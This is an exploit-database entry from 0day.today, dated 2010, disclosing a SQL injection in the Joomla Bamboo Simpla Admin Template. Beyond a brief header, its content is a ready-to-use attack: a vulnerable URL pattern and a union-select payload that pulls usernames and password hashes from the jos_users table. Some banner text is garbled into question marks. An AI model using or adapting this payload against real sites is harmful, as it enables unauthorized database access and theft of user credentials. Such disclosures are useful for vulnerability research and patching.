Joomla Bamboo Simpla Admin Template SQL Injection Vulnerability

2010-01-03T00:00:00
ID 1337DAY-ID-10578
Type zdt
Reporter R3d-D3v!L
Modified 2010-01-03T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
Joomla Bamboo Simpla Admin Template SQL Injection Vulnerability
===============================================================

[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?]
[~] Tybe: Joomla Bamboo Simpla Admin Template suffer from REMOTe sql injection
[~] Vendor: .joomlabamboo.com
[?] Software:Joomla Bamboo Simpla Admin Template
[-]
[?] author: ((R3d-D3v!L))
[?] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY
[?] contact: N/A
[?]
[-]??????????????????????{DEV!L'5 of SYST3M}??????????????????
 
 
[*] Err0r C0N50L3:
 
 
http://server/P47H/index.php?option=com_content&view=article&id= {EV!L EXPLO!T}
 
[~] {EV!L EXPLO!T}:
 
-666/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--
 
 


#  0day.today [2018-03-09]  #